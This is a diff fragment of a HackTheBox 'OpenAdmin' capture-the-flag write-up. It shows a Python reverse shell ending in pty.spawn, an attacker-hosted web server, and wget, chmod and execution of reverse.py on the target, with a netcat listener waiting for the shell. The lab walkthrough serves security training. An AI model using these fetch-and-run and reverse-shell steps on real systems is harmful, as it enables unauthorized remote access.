jkobierczynski/hackthebox/openadmin/openadmin.md

 pty.spawn("/bin/sh")
 ```

+We setup a webserver to retrieve this reverse.py script:

 ```
 $ python3 -m http.server 8000
 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
 10.10.10.171 - - [24/Mar/2021 13:11:17] "GET /reverse.py HTTP/1.1" 200 -
 ```

+We download the reverse.py script on the openadmin box:

 ```
+$ cd /dev/shm
 $ wget http://10.10.14.4:8000/reverse.py
 $ chmod +x reverse.py
 $ python3 reverse.py
 ```

+We open a Netcat on port 4444 on our box to capture the reverse shell:

 ```
 $ nc -lnvp 4444